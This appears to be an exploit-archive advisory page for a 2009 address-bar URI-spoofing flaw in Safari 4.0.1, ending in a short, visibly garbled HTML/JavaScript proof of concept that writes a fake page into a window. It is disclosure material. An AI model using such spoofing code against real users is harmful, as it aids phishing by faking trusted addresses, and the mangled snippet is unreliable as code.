Apple Safari 4.0.1 - Error Page Address Bar URI Spoofing

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057940 漏洞类型
发布时间 2009-06-27 更新时间 2009-06-27
漏洞平台 Multiple CVSS评分 N/A

Apple Safari is affected by a URI-spoofing vulnerability.

An attacker may leverage this issue by inserting arbitrary content to spoof a URI presented to an unsuspecting user. This may lead to a false sense of trust because the victim may be presented with a URI of a seemingly trusted site while interacting with the attacker's malicious site.

Safari 4.0.1 is affected; other versions may also be vulnerable.

This issue is similar to the vulnerability discussed in BID 35803 (Mozilla Firefox Error Page Address Bar URI Spoofing Vulnerability). 

</script> <center> <h1>Firefox spoofing</h1> </center> <p> <a href="javascript:spoof()">test!</a> <p> <script> function spoof() { a =",") a.document.write("<H1>FAKE PAGE<\h1>") a.document.write("<title>test</title>") a.stop (); } </script> <br> Juan Pablo Lopez Yacubian